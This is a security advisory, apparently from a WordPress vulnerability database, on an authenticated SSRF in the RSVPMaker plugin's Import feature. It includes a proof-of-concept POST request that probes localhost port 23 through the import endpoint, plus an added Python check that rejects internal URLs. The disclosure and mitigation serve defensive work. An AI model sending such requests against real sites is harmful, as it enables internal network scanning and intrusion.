RSVPMaker < 8.7.3 - Authenticated (admin+) SSRF
Description
The Import feature of the plugin (/wp-admin/tools.php?page=rsvpmaker_export_screen) takes a URL input and calls curl on it without first validating that the URL points to a remote host rather than an internal one. As a result, a high privilege user could use that feature to scan the internal network via an SSRF attack.
Proof of Concept
Go to the Import feature (wp-admin/tools.php?page=rsvpmaker_export_screen), enter an internal URL and click 'Import'.

Request:

POST /wp-json/rsvpmaker/v1/importnow HTTP/1.1
Host: 172.28.128.50
Content-Length: 52
Accept: */*
X-Requested-With: XMLHttpRequest
X-WP-Nonce: b56e26b3f8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.28.128.50
Referer: http://172.28.128.50/wp-admin/tools.php?page=rsvpmaker_export_screen
Accept-Language: en-US,en;q=0.9
Cookie: [admin cookies]
Connection: close

importrsvp=http%3A%2F%2F127.0.0.1%3A23&start=0

Response:

cURL error 7: Failed to connect to 127.0.0.1 port 23: Connection refused
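The check the Import feature lacked, as an added example written in Python for illustration (it is not the plugin's PHP code): a URL is accepted only if its scheme is http or https and every address its host resolves to is public, so the PoC value http://127.0.0.1:23 is rejected before anything is fetched. Function names and the sample URLs below are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def resolve_host(host):
    """Return the set of IP addresses a host currently points at.
    Literal IPs pass straight through; names are looked up because a
    public-looking hostname may resolve to an internal address."""
    try:
        return {ipaddress.ip_address(host)}
    except ValueError:
        pass  # not a literal address, fall through to DNS
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return set()
    return {ipaddress.ip_address(info[4][0]) for info in infos}


def is_internal(addr):
    # is_global is False for loopback, RFC 1918, link-local (incl. the
    # 169.254.169.254 metadata range), unique-local and reserved space.
    return not addr.is_global


def is_safe_import_url(url, resolver=resolve_host):
    """True only for http(s) URLs whose host resolves exclusively to public
    addresses. Odd schemes, missing or unresolvable hosts, and any internal
    address are rejected. The resolver parameter exists so the check can be
    exercised offline; the default uses real DNS."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    addrs = resolver(parts.hostname)
    if not addrs:
        return False
    return all(not is_internal(a) for a in addrs)


if __name__ == "__main__":
    # Constructed sample inputs, including the PoC value from the advisory.
    for candidate in ("http://127.0.0.1:23", "http://[::1]:23/",
                      "http://169.254.169.254/latest/meta-data/",
                      "file:///etc/passwd", "http://93.184.216.34/feed"):
        print(candidate, "->", "allowed" if is_safe_import_url(candidate) else "rejected")
```

Because DNS answers can change between this check and the fetch, and because curl follows redirects, the same check has to be applied to the address actually connected to and to every redirect target, not just the submitted string.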
Classification
Type
SSRF
Miscellaneous
Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes
Timeline
Publicly Published
2021-06-29
Added
2021-06-29
Last Updated
2022-01-17